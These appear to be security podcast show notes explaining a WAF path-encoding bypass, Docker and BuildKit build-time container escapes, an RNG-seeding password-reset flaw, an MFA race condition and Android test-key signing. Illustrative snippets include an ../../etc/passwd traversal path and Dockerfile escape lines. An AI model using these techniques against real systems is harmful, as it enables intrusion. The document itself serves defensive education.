Show Notes

239 - Public Private Android Keys and Docker Escapes

The issue itself is fairly easy to describe: Meta found that, of 14 reputable brands, seven had releases where one or more preinstalled APEX modules (privileged OS code) were signed using only the test keys that are publicly available in the Android Open Source Project (AOSP) repository.

The exact root cause is likely difficult to determine, and the OEMs are unlikely to call anything out, but Meta does raise a few possibilities:

  1. There is a Compatibility Test Suite which is supposed to enforce various compatibility and security guarantees. Checking the signing keys used is part of both PackageSignatureTest and ApexSignatureVerificationTest. However, both of these tests use hard-coded lists of keys which have, over time, diverged from the actual test keys used by the AOSP project.
  2. The default AOSP build signs all of the OTA updates, APKs, and APEX modules with the test keys. The OEM is then expected to run a separate script that replaces test keys with release keys according to a specified mapping. If one forgets to specify a test-to-release key mapping, however, the test key simply is not replaced, with no warning or other indication.
  3. The official documentation is outdated and initially only mentions signatures being used for APKs and OTA updates, not APEX modules. It's only under the section “Advanced Signing Options” that APEX modules are even mentioned.
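The second failure mode is easy to picture in code. Below is a purely hypothetical sketch of a re-signing step that swaps test keys for release keys from a mapping; the names (`KEY_MAP`, `resign`, the module names) are illustrative, not AOSP's real tooling. The point is the silent fallback: a module missing from the mapping keeps the public test key with no warning.

```python
# Hypothetical model of the re-signing pitfall: modules absent from the
# OEM's key mapping silently keep the AOSP test key.

AOSP_TEST_KEY = "testkey"

# OEM-supplied mapping of module -> release key (illustrative names).
KEY_MAP = {
    "com.android.runtime": "oem-release-key-1",
    "com.android.media":   "oem-release-key-2",
    # "com.android.wifi" was forgotten here...
}

def resign(modules):
    signed = {}
    for module in modules:
        # No mapping entry? The test key is kept, and nothing flags it --
        # the failure mode Meta suggests shipped on several devices.
        signed[module] = KEY_MAP.get(module, AOSP_TEST_KEY)
    return signed

result = resign(["com.android.runtime", "com.android.media", "com.android.wifi"])
print(result["com.android.wifi"])  # still "testkey"
```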

Andrea Menin brings us a great find with a deviously simple WAF bypass. The core bug belongs to ModSecurity and the variables it exposes to be used by the various rulesets others have created.

The concept here is simple: the REQUEST_FILENAME variable should normally contain the entirety of the request path, starting from the first / and ending at the start of the URL parameters as designated by the ? character. For example, given /api/v3/example/endpoint?param=1, REQUEST_FILENAME is /api/v3/example/endpoint.

The problem is that ModSecurity attempts to decode any URL-encoded sequences in the path before it parses out the start of the parameters. So if a path includes a %3F (the URL-encoded form of ?), any data after the %3F will not be included in the REQUEST_FILENAME variable, even though the actual backend server is very likely to include it in the path. That creates room to easily smuggle in bits that would usually get blocked by a WAF. The REQUEST_BASENAME and PATH_INFO variables are also impacted by this issue.
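The decode-before-split ordering can be sketched in a few lines. This is a toy model of the behavior described above, not ModSecurity's actual parser: one function decodes first and then splits on ?, the other splits first like a typical backend would, and the two disagree about what the path is.

```python
from urllib.parse import unquote

def waf_request_filename(raw_path):
    # Buggy order (mirrors the issue above): decode %XX sequences first,
    # THEN split on '?', so an encoded %3F truncates the path the WAF sees.
    decoded = unquote(raw_path)
    return decoded.split("?", 1)[0]

def backend_path(raw_path):
    # Typical backend: split on the literal '?' first, then decode,
    # so %3F remains part of the path.
    return unquote(raw_path.split("?", 1)[0])

raw = "/innocent%3F/../../etc/passwd"
print(waf_request_filename(raw))  # '/innocent' -- payload hidden from rules
print(backend_path(raw))          # '/innocent?/../../etc/passwd'
```

Anything placed after the %3F is invisible to rules matching on REQUEST_FILENAME while still reaching the backend as part of the path.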

It's long been a classic to abuse accidentally exposed file descriptors through /proc/self/fd to break out of sandboxes, so it's kind of fun to see a similar sort of bug impacting Docker, enabling a container break-out either at run-time or during build-time.

As you would expect, Docker does close any file descriptors that point back to the host system before handing over control to the final sandboxed process. However, during the build process some of the sensitive file descriptors that belong to the host system are still open. So it is possible to use the WORKDIR directive to hold a reference to a descriptor so that it remains open after Docker has closed its own references, for example: WORKDIR /proc/self/fd/5 (5 is just a made-up descriptor number, and probably not a working payload as-is).

With the reference held open, one could potentially chdir out into the host system, escaping the confines of the container filesystem.
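A minimal sketch of what such a Dockerfile stage might look like; the descriptor number is made up, and this is not a confirmed working payload:

```dockerfile
FROM alpine
# If descriptor 5 happens to be a host directory still open during the
# build, WORKDIR resolves it and keeps a reference alive past Docker's
# fd cleanup. The number 5 is illustrative only.
WORKDIR /proc/self/fd/5
# From here, relative traversal (e.g. RUN ls ../../..) could potentially
# walk out into the host filesystem.
```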

Deep within BuildKit there is access to a privileged gRPC API that could be abused to break out of a container during build-time.

This one is kind of cool because it's relatively simple. Generally speaking, the only users of the gRPC API are privileged users going through tools like the Docker CLI, and in that context it kind of makes sense that the Container.Start command lacks any contextual authorization checking. However, it turns out Dockerfiles support a custom syntax via a # syntax=<path to docker image> line. This line will run the specified Docker image, have that image process the Dockerfile, and send the intermediate representation of the Dockerfile over the gRPC API. As such, this Docker image is given access to the API and can reach other, unexpected commands like the previously mentioned Container.Start. This means the Dockerfile custom-syntax parser could start up an arbitrary container with any settings, including marking it as privileged (aka running as root on the host).
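For context, here is what triggering a custom frontend looks like in a Dockerfile; the image name is a made-up placeholder, not an actual exploit:

```dockerfile
# syntax=registry.example.com/attacker/malicious-frontend:latest
# The image named above (hypothetical) is pulled and run as the build
# "frontend". BuildKit hands it the build's gRPC session, from which
# calls like Container.Start were reachable without further checks.
FROM alpine
RUN echo "the frontend, not this file, decides what actually happens"
```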

This is a great crypto issue that I think anyone could hunt for; it has to do with the seeding of random number generators. Generally speaking, in many systems, if you know the seed you can break/predict the values that will come from the random number generator. This can actually be a somewhat useful feature, as it allows repeatability of “random” events just by using the same seed.

In this case you have two systems that both depend on some randomness. First there is the password reset system, which generates a random token that is sent to the user so they can reset their password. The other is the captcha system, which uses randomness to generate a randomized image to serve as the captcha. The way the captcha's image generator worked is that it would take in a key value used to seed the random number generator, so that requests for the same image with the same key would in fact get the same random image each time.

The problem with these two systems existing together is that one could use the /image/<key> endpoint to set the random number generator's seed, and then go through the password reset flow. As the seed had just been reset, the verification code generated will be the same each time the attacker resets the seed.
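The interaction can be modeled in a few lines. This is a toy of the described design, not the real service: the endpoint names and token format are invented, and the key detail is simply that both features draw from one shared, attacker-seedable RNG.

```python
import random
import string

# One RNG shared by both "endpoints" (the vulnerable pattern).
rng = random.Random()

def captcha_image(key):
    # /image/<key>: seeds the shared RNG so identical keys render
    # identical "random" images.
    rng.seed(key)
    return [rng.randint(0, 255) for _ in range(16)]  # stand-in pixels

def reset_token():
    # Password-reset flow: draws its token from the same RNG.
    return "".join(rng.choice(string.ascii_lowercase) for _ in range(8))

# Attacker: fix the seed via the captcha endpoint, then request a reset.
captcha_image("anything")
predicted = reset_token()

# Re-seed with the same key -- the next reset token is now predictable.
captcha_image("anything")
print(reset_token() == predicted)  # True
```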

Though perhaps an accidental find by Abhi Sharma, it is a great one nonetheless: a race condition leading to the bypass of an MFA check.

The MFA check in question here came before generating a personal access token, so an attacker would already have to be in a fairly privileged position to take advantage of it. The gist of the issue, though, is just that spamming POST requests at the /api/integrations/personal_access_tokens endpoint used to generate new tokens would occasionally let a request through without needing to pass the MFA check.

Exactly how this works is hard to say, but it did feel like exactly the sort of issue James Kettle was thinking of in his recent research, Smashing the State Machine. To me, this feels like possibly some transitory state in the system as it updates between needing and not needing the MFA token to be filled out, a partially-updated state that can perhaps be hit for this MFA bypass. Ultimately that is speculation on my side, but it's a neat bug to see.
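The general check-then-act shape such races take can be shown deterministically with a barrier standing in for lucky timing. This is a toy model, not the vendor's actual code: two concurrent "requests" both pass a single MFA check before either consumes it.

```python
import threading

# Toy of the check-then-act window: state and endpoint names are invented.
mfa_satisfied = True                  # one MFA approval on the account
tokens_issued = []
both_checked = threading.Barrier(2)   # forces the racy interleaving

def create_personal_access_token(request_id):
    global mfa_satisfied
    if mfa_satisfied:                 # check...
        both_checked.wait()           # ...window where a second request
                                      # can also pass the same check
        mfa_satisfied = False         # ...then act (consume the approval)
        tokens_issued.append(request_id)

threads = [threading.Thread(target=create_personal_access_token, args=(i,))
           for i in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(len(tokens_issued))  # 2 -- two tokens issued for one MFA approval
```

In the real world the window is tiny, which is why it took a spray of concurrent POSTs to occasionally land inside it; the fix is to make the check and the consumption a single atomic operation.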